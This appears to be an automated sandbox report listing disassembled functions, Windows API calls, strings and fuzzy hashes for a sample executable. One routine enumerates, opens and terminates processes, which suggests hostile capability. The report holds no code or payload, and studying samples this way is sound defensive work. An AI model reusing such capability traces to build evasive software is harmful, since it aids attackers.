                                                                                                                                                                                            • Opcode Fuzzy Hash: e158e7cf22e74cec819319abcec0173db0779319f0c80bf8000b48deca5a0bc9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3851ED766012159FCB24CF5CC480E9AFBE4FF68310B0485ABE9199B752D732ED04CBA0
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 005D1F88
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initstd::locale::_
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 1620887387-1866435925
                                                                                                                                                                                            • Opcode ID: 3a3bf96cb8015d797bf87146d02e12d2eeca20413438d43a9124579f78ca5970
                                                                                                                                                                                            • Instruction ID: 1f0fbc8e582b4647edf136d03128d2e8641f60848235fa0dc1e8c1725d79c518
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a3bf96cb8015d797bf87146d02e12d2eeca20413438d43a9124579f78ca5970
                                                                                                                                                                                            • Instruction Fuzzy Hash: 99417FB06007069FD720CF59C598B5BBFE4BF04304F44896ED94A8B782D7B6E958CB91
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::locale::_Init.LIBCPMT ref: 005E4D99
                                                                                                                                                                                              • Part of subcall function 005EF760: std::_Lockit::_Lockit.LIBCPMT ref: 005EF772
                                                                                                                                                                                              • Part of subcall function 005EF760: std::locale::_Setgloballocale.LIBCPMT ref: 005EF78D
                                                                                                                                                                                              • Part of subcall function 005EF760: _Yarn.LIBCPMT ref: 005EF7A3
                                                                                                                                                                                              • Part of subcall function 005EF760: std::_Lockit::~_Lockit.LIBCPMT ref: 005EF7E3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 238635018-1866435925
                                                                                                                                                                                            • Opcode ID: f20416c6e9972406d310124c11d303940b7f52e37b25951c8a9d81b7168b159e
                                                                                                                                                                                            • Instruction ID: 5aaa403f5f67b3dfb6bec5a751f904a5254765e772268557c26d6739b2b42168
                                                                                                                                                                                            • Opcode Fuzzy Hash: f20416c6e9972406d310124c11d303940b7f52e37b25951c8a9d81b7168b159e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3631C0B19007459FE724DF25C459B57BBE8BF80304F048929D9868BA82E7BAE804CB81
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 005DF447
                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 005DF45A
                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 005DF45F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: D
• API String ID: 2922976086-2746444292
• Opcode ID: c89bfbc05a533cefb44b05c714eb175de6b28b992c5a4d01b4cb6e4e6e4d76c1
• Instruction ID: 044741e4da620c9fc33eb5838826336705129741b9c690e0da8ea529b236e91f
• Opcode Fuzzy Hash: c89bfbc05a533cefb44b05c714eb175de6b28b992c5a4d01b4cb6e4e6e4d76c1
• Instruction Fuzzy Hash: 5A319E32E1021D9BDB20CF98CD45BEEBB76BF99314F24561AE50577284E7B06980CBA0

APIs
• _free.LIBCMT ref: 0060C9E4
• _free.LIBCMT ref: 0060CA0D
• SetEndOfFile.KERNEL32(00000000,0060ACFD,00000000,0060AF94,?,?,?,?,?,?,?,0060ACFD,0060AF94,00000000), ref: 0060CA3F
• GetLastError.KERNEL32(?,?,?,?,?,?,?,0060ACFD,0060AF94,00000000,?,?,?,?,00000000), ref: 0060CA5B
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: _free$ErrorFileLast
• String ID:
• API String ID: 1547350101-0
• Opcode ID: 9b60cce1e5e38ce49f53287086fc94a5ab30037d61fb019df1c686e35a04b3ba
• Instruction ID: 17303b2194ffeeba7f3e1d4e134954213bcaaec7aded57b5ecd79a4a654e7a47
• Opcode Fuzzy Hash: 9b60cce1e5e38ce49f53287086fc94a5ab30037d61fb019df1c686e35a04b3ba
• Instruction Fuzzy Hash: EF41E872A806099BDB19ABB8CD4ABAF3B6AFF84370F140614F514E72E1EA34CD414761

APIs
  • Part of subcall function 005F93E4: _free.LIBCMT ref: 005F93F2
  • Part of subcall function 0060408B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00601A10,?,00000000,00000000), ref: 00604137
• GetLastError.KERNEL32 ref: 006044FE
• __dosmaperr.LIBCMT ref: 00604505
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00604544
• __dosmaperr.LIBCMT ref: 0060454B
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
• String ID:
• API String ID: 167067550-0
• Opcode ID: d81cf207b2ac5ec23d0aa5b9f454a8893a2bd19978c41c2f8159d4260eb3139c
• Instruction ID: 135ebc082075c99dbb8ce3ac0cad1bdab9bf673b1d9ca00bb1ed48c7276dd303
• Opcode Fuzzy Hash: d81cf207b2ac5ec23d0aa5b9f454a8893a2bd19978c41c2f8159d4260eb3139c
• Instruction Fuzzy Hash: 7321B2F1640609AFDB35AF658C809BBB7AEFE443647104519FA25972C1EF70EC0087A0

APIs
• GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
• _free.LIBCMT ref: 005FCAF2
• _free.LIBCMT ref: 005FCB28
• SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
• Opcode ID: 0356c869eb3808505d8201e15eca3e9fb6b2957e3536b54cdfeaaa7db46849da
• Instruction ID: 7271bbdafede5cecc3eaccbc290daeacdda986948000be015ffad5bf3e86bece
• Opcode Fuzzy Hash: 0356c869eb3808505d8201e15eca3e9fb6b2957e3536b54cdfeaaa7db46849da
• Instruction Fuzzy Hash: 3611297224460E7AD71267759E8BD7B2E2BFBC13B072C0B35F764921D2DD6D8C018121

APIs
• GetLastError.KERNEL32(?,?,?,005F8B2B,006009C0,?,?,005F18D8,?,?,?,?,?,005D11E3,?,?), ref: 005FCBEC
• _free.LIBCMT ref: 005FCC49
• _free.LIBCMT ref: 005FCC7F
• SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,005F18D8,?,?,?,?,?,005D11E3,?,?), ref: 005FCC8A
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: ErrorLast_free
• String ID:
• API String ID: 2283115069-0
• Opcode ID: 2444f3fa51ea211d91ed8f7aeef7e0a1ccc3847773dcd0feaac307b3d8df93ad
• Instruction ID: ce45aacd8d2be4dac93facfab59c017ee68eb32242922d9429f81919c8886692
• Opcode Fuzzy Hash: 2444f3fa51ea211d91ed8f7aeef7e0a1ccc3847773dcd0feaac307b3d8df93ad
• Instruction Fuzzy Hash: 8211007120450D7AD71127769E8AD3B3E5BFBC27B07280A35F33C831D2DD298C015121

APIs
• K32EnumProcesses.KERNEL32(?,00001000,?), ref: 005D134D
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 005D1397
• TerminateProcess.KERNEL32(00000000,00000000), ref: 005D13A2
• CloseHandle.KERNEL32(00000000), ref: 005D13A9
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: Process$CloseEnumHandleOpenProcessesTerminate
• String ID:
• API String ID: 1176117389-0
• Opcode ID: 9748d41ae2ff0f38a87fb646dc225f11f5261d662fc1ae80c280a2d254a28d87
• Instruction ID: baa0f422620a5c562f1ac2d02bc5a88c5939e8739332f2586ac7fb2024f5ca79
• Opcode Fuzzy Hash: 9748d41ae2ff0f38a87fb646dc225f11f5261d662fc1ae80c280a2d254a28d87
• Instruction Fuzzy Hash: 1701473260021977EB209AE8EC45FDF379DEB08301F000472FF09C2240EAA1DD404369

APIs
• WriteConsoleW.KERNEL32(00000000,00000000,00000010,00000000,00000000,?,00608E52,00000000,00000001,00000000,00000000,?,005FE22D,?,00000010,00000000), ref: 0060C504
• GetLastError.KERNEL32(?,00608E52,00000000,00000001,00000000,00000000,?,005FE22D,?,00000010,00000000,?,00000000,?,005FE779,00000010), ref: 0060C510
  • Part of subcall function 0060C4D6: CloseHandle.KERNEL32(FFFFFFFE,0060C520,?,00608E52,00000000,00000001,00000000,00000000,?,005FE22D,?,00000010,00000000,?,00000000), ref: 0060C4E6
• ___initconout.LIBCMT ref: 0060C520
  • Part of subcall function 0060C498: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0060C4C7,00608E3F,00000000,?,005FE22D,?,00000010,00000000,?), ref: 0060C4AB
• WriteConsoleW.KERNEL32(00000000,00000000,00000010,00000000,?,00608E52,00000000,00000001,00000000,00000000,?,005FE22D,?,00000010,00000000,?), ref: 0060C535
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                            • Opcode ID: 8138b3e5f7ed4224d6308ead09d9b41faea6ab792ffa4799d9e9b2e29c177312
                                                                                                                                                                                            • Instruction ID: fde54d58e061b05a5f6ee79a86461653a8ce5b13e519a410a06ece309f0a1f69
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8138b3e5f7ed4224d6308ead09d9b41faea6ab792ffa4799d9e9b2e29c177312
                                                                                                                                                                                            • Instruction Fuzzy Hash: 58F0AC37580168BBCF262F95EC04ADB3F67FF093B1B059914FA1E95160C67298309B94
APIs
• _free.LIBCMT ref: 005FBCA8
  • Part of subcall function 005FCE37: HeapFree.KERNEL32(00000000,00000000,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?), ref: 005FCE4D
  • Part of subcall function 005FCE37: GetLastError.KERNEL32(?,?,00606429,?,00000000,?,?,?,006066CC,?,00000007,?,?,00606BBF,?,?), ref: 005FCE5F
• _free.LIBCMT ref: 005FBCBB
• _free.LIBCMT ref: 005FBCCC
• _free.LIBCMT ref: 005FBCDD
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 59213797d60a23f856efa21cdccb972af46dbec5f72dba2a3026ed9b8142d6dc
• Instruction ID: 7e8b748440be66ce3e61c59c47ad2322122c0cb908c4c69c746a8e3b372c5c94
• Opcode Fuzzy Hash: 59213797d60a23f856efa21cdccb972af46dbec5f72dba2a3026ed9b8142d6dc
• Instruction Fuzzy Hash: 63E04F7140492AABA7222F10BF0A4663E27B7A57903036416F75006232C67511B3DF80
APIs
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 005DEF60
Strings
Similarity
• API ID: Ios_base_dtorstd::ios_base::_
• String ID: 0$H
• API String ID: 323602529-1388647558
• Opcode ID: 5296f759b5d686c7febd6911476d7bafc31e6643e819bd38d673c8cd0aefa021
• Instruction ID: 2669bf2706dae0869e5af551dffe1cb4cc63af6cb84002996a63ddc271f496f6
• Opcode Fuzzy Hash: 5296f759b5d686c7febd6911476d7bafc31e6643e819bd38d673c8cd0aefa021
• Instruction Fuzzy Hash: FFA14B70A002599FDB24CF58C885BDEBBB5FF49300F1485E9E449AB381DB71AA88CF51
APIs
• __startOneArgErrorHandling.LIBCMT ref: 005F919D
Strings
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: dbe4cb42b185592ee715eed2bf63ac1f3124a75edf241e356e6a0729265563ee
• Instruction ID: e33bb2f186ee6d2a7d7d0a4ce2e3213e7e1a2d4aa2efff8ec0d4065948182768
• Opcode Fuzzy Hash: dbe4cb42b185592ee715eed2bf63ac1f3124a75edf241e356e6a0729265563ee
• Instruction Fuzzy Hash: 36518D61A4890796CB197714CD057FB3FAAFF40702F248D6EE191423E8EB394ED1DA46
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 005DFB90
• Concurrency::cancel_current_task.LIBCPMT ref: 005DFB95
Strings
Similarity
• API ID: Concurrency::cancel_current_task
• String ID: e^
• API String ID: 118556049-2283852391
• Opcode ID: 7333919df190098a016cfe7dbdb365896b105da4e3f8f89e44a2f20269ce9e39
• Instruction ID: 4d68f9e42f65585c56631ccddd4b415b0d57e0e2d54a27fce4da622bfb3d3f03
• Opcode Fuzzy Hash: 7333919df190098a016cfe7dbdb365896b105da4e3f8f89e44a2f20269ce9e39
• Instruction Fuzzy Hash: 67417C356007129FD724CF29D490A2ABBE5FF98710B14893FE8DA8B752D731E991CB90
Strings
Similarity
• API ID:
• String ID: C:\Users\user\Desktop\RPHbzz3JqY.exe
• API String ID: 0-2732183378
• Opcode ID: e913d240976a20e3e738c7875e808fa139fe102b7ffa02e9aa06bdea0362e2ae
• Instruction ID: 9bf0520eaed447d8e0732ed662cc94ba320d74e1aa5c1972148ad0fbe12931cd
• Opcode Fuzzy Hash: e913d240976a20e3e738c7875e808fa139fe102b7ffa02e9aa06bdea0362e2ae
• Instruction Fuzzy Hash: CF41A0B1A00A1DAFDB229F99D985ABEBFF9FFC5310B10006AE64497251D7B48E41CB50
APIs
• EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 005F4097
Strings
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: 5096c7c9fe75f529601351cbb6ef95308ea32f17db9f0d7fb12a941b2d186c5b
• Instruction ID: bdeb0d41f56e8ebafa6abcac2cd5f4fe51262595c5b2e1c49b2d4ce209ed7c65
• Opcode Fuzzy Hash: 5096c7c9fe75f529601351cbb6ef95308ea32f17db9f0d7fb12a941b2d186c5b
• Instruction Fuzzy Hash: B141467290020DAFDF15DF98CC85AAEBFB5BF58300F198159FA04A7211D7399AA1DF50
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 005D23CE
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                                                                                            • String ID: c4]$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 2659868963-3697889776
                                                                                                                                                                                            • Opcode ID: 94ba8d3c9167f167e53a54d618ae3591a7a00002f7c6054525edddad74d3d71d
                                                                                                                                                                                            • Instruction ID: 319f2c97b2997026db8ff841ba1f5cf074899524d14783ef2390db26b51dc8f3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 94ba8d3c9167f167e53a54d618ae3591a7a00002f7c6054525edddad74d3d71d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B210472600109ABD718EF5CC885AAEFFADEF85310F10C55BFA4497341E775AE808BA0
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID: l=a
                                                                                                                                                                                            • API String ID: 269201875-4006736422
                                                                                                                                                                                            • Opcode ID: 375742af8de880917483bec6587131f47f741514c068a19653904d8e269ce124
                                                                                                                                                                                            • Instruction ID: 42052439f09afeff626dfb29e36c959ba9635da477b5322e4357965dce0da80e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 375742af8de880917483bec6587131f47f741514c068a19653904d8e269ce124
                                                                                                                                                                                            • Instruction Fuzzy Hash: BFF0C8735883156AE7192A61EC42BE73F9EEF81774F24043EFA0C9A2C3DA61185146F5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005EF7FC
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005EF857
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                            • String ID: @0]
                                                                                                                                                                                            • API String ID: 593203224-1162301288
                                                                                                                                                                                            • Opcode ID: 2d8d7fa8ec9a8b7c7b50c28b8778e920b56d4ed48ec0c5bbfd2b8ea99a4d7e07
                                                                                                                                                                                            • Instruction ID: 60355878ce4de900226dd5255e4624c29e4efb74426a2d67503bd7e237ae888a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d8d7fa8ec9a8b7c7b50c28b8778e920b56d4ed48ec0c5bbfd2b8ea99a4d7e07
                                                                                                                                                                                            • Instruction Fuzzy Hash: B1017135600215AFDB09DF15C895E5EBF79FF84750B1404A9E8459B3A1EF71EE40CB90
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005D2078
                                                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005D20BC
                                                                                                                                                                                              • Part of subcall function 005EF860: _Yarn.LIBCPMT ref: 005EF87F
                                                                                                                                                                                              • Part of subcall function 005EF860: _Yarn.LIBCPMT ref: 005EF8A3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                                            • API String ID: 1908188788-1405518554
                                                                                                                                                                                            • Opcode ID: caae7583464a876da91437bf0d0d3e44bd0a8ad7acf44016b2fb1c82ec646e14
                                                                                                                                                                                            • Instruction ID: 5e53f0a18644cce25c4c3b13bc9d9500850f35d6ef74bfa5690bc30fa25d3e14
                                                                                                                                                                                            • Opcode Fuzzy Hash: caae7583464a876da91437bf0d0d3e44bd0a8ad7acf44016b2fb1c82ec646e14
                                                                                                                                                                                            • Instruction Fuzzy Hash: 23F04971100B808ED3349F7A8409743BEE4AF25310F004A2EE5CAC7A82E775E508CBA5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(0061D3B0,0000000C), ref: 005F7DF2
                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 005F7DF9
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorExitLastThread
                                                                                                                                                                                            • String ID: @0]
                                                                                                                                                                                            • API String ID: 1611280651-1162301288
                                                                                                                                                                                            • Opcode ID: 09662a7dcd606d962caa9849debef9cc578e101770e74338eba63234599fa8bb
                                                                                                                                                                                            • Instruction ID: c4f63b80a8c98a3ae01883856452aa64b41320dbcf8e53d084e8099679db82f0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 09662a7dcd606d962caa9849debef9cc578e101770e74338eba63234599fa8bb
                                                                                                                                                                                            • Instruction Fuzzy Hash: CCF0A47094061E9FDB10AF70C80EA7E7F75FF85710F240959F2119B291CB795901CBA1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 005EF11B
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 005EF132
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
